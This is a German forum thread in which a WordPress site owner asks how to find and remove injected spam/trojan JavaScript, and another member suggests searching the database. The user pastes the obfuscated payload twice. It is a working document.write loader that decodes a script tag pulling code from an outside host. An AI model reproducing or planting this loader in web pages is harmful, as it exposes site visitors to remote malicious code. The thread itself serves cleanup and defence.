Wordpress Spam

  • Ersteller LukeStylewalker
  • Erstellt am
L

LukeStylewalker

Aktives Mitglied
Thread Starter
Dabei seit
04.06.2009
Beiträge
194
Reaktionspunkte
12
Hallo Zusammen,

ich bin grad mit meinen Latein am Ende.

Ich bekomme dieses Javascript nicht gefunden auf einer Wordpress Installation.

Ich weiss nicht wie es da reingekommen ist und hat angeblich Spam und nen Trojaner versendet. Nun hab ich soweilt alles gelöscht, verstehe aber nicht wie es dazu kommt bzw wie ich es komplett entferne.

Weiss jmd Rat?

"<![CDATA[
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fvfulsw%2853vuf%286G%2855kwws%286D22tmdyddss1frp2mdyd2mtxhu%7C041%3A141plq1mv%2855%286H%286F2vfulsw%286H3')"
 
gibt doch alle nase lang in wordpress oder dessen plugins sicherheitslücken.
hast mal die datenbank nach CDATA oder sonstigen teilstring durchsucht?
 
  • Gefällt mir
Reaktionen: LukeStylewalker
Hab die DB durchsucht, bis auf den hier, hab ich alle entfernen können:

<a title="www.xxx.de" href="http://www.xxx.de">www.xxx.de</a><script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fvfulsw%2853vuf%286G%2855kwws%286D22tmdyddss1frp2mdyd2mtxhu%7C041%3A141plq1mv%2855%286H%286F2vfulsw%286H3')</script></p>

find den partout nicht.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben Unten